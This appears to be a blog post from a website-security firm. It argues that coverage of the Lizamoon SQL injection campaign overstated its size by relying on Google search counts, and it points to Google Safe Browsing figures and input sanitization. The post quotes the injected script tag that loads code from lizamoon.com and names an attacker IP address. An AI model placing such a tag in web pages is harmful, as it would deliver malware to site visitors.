The Hype Surrounding “Massive” Malware SQL Injections

Every so often there is another round of a fairly unsophisticated SQL injection that places malware scripts into poorly coded websites occurs and then there is a enviably a security company that hypes the infections and flood of new stories about it.  Another round of the infection occurred in the last week, dubbed Lizamoon by Websense who is the company to hype this round (we previously discussed Websense’s false claims of WordPress security issues). From what we have seen dealing with malware infected websites and other data confirms is that these “massive” infections are not massive as they are claimed to be each time, in fact they are of average size for a malware infection of websites. Most of those average size malware infections never receive any press coverage. The reason these attacks seems to receive the coverage is because of the use of Google search results to provide a large but highly inaccurate measure of the size of the infection.

The most important thing to understand about these infections, and this often not mentioned, is that they are completely preventable by properly sanitizing user input data that will be sent to a database. Anyone coding should be well aware of this the possibility of a SQL injection , these specific attacks have been occurring for years, and take the necessary precautions. Prevent SQL injections is one of key things mentioned in our article on securing your website from hackers. Widely used software like WordPress, Drupal, and Joomla are not susceptible to such a basic SQL injection. Unfortunately, even websites that get hit often don’t bother to take the necessary precautions to prevent these SQL injections. Instead, they often just remove the code from the database. There are also unethical website malware removal companies that will remove the infection from the database without insuring the SQL injection vulnerability has been fixed.

Normally you cannot search for a malware using Google’s search engine. This is due the fact Google only makes a web page’s text content searchable and not the HTML code that makes up the page. The malware either consists of a script of iframe tag, both of with are HTML code that would not be searchable. What happens with these injections is that they get placed throughout out the database, in some instances they are placed in a location where the code from the database is escaped while the web page is being generated. So in the source code it would look like

<script src=http://lizamoon.com/ur.php></script>

instead of

<script src=http://lizamoon.com/ur.php></script>

.Because the code has been escaped it will appear as text in the pages and therefore be searchable. When the code is placed into the website in escaped form it is not infectious.

There are several problems with trying to use Google search results to measure the size infection:

  • The number that Google provides in an estimate, it’s not all clear how accurate it is. If you include duplicate pages currently you can only see 604 results for the search “<script src=http://lizamoon.com/ur.php></script>” despite there being “about 1,470,000 results”.
  • The number includes any page, like this one, that mentions the code.
  • Not all pages that have the code are actually infection, because the code only searchable if it escaped. So it would require that another instance that is not escaped be one the page for it to be infectious. We checked the first 10 results for the search “<script src=http://lizamoon.com/ur.php></script>” which were still injected and found that only four of them were infectious.
  • Most malware infections are not measurable using search results making a comparison with them impossible using the metric.
  • Web pages are not a good measure of the reach of a malware infection. A page could be accessed millions of times a day or never.

The ideal way to measure the size of a malware infection would be to determine how many times each pages with the malware would be accessed. There is not a tool able to do this and there is unlikely to be one.  What we have found to best indicator available to measure the size of a malware infection size is Google Safe Browsing system. This system scans web pages from across the Internet for malware. This data is used to block infected websites in Google’s search results and is also used for malware protection in the FireFox, Chrome, and Safari web browsers.  It does not scan all websites and does not scan all of the websites it does scan equally, so the number won’t include every infected website. Google doesn’t indicate what criteria it uses to determine how often it scan various, but in general it scans more popular website more often so it should provide a good measure of how many website that people are likely to access were infected. At the moment the system reports that lizamoon.com has infected 1436 domains. That is far lower than the nearly 4 million websites claimed to have been infected according to one source, far lower than the 1,470,000 reported for a search on “<script src=http://lizamoon.com/ur.php></script>”, and far lower than “hundreds of thousands of domains” claimed by Websense. By comparison, the IP address 86.55.140.203 that is called by a infection that has recently been hitting many osCommerce based websites is reported to have acted as an intermediary for 2957 sites.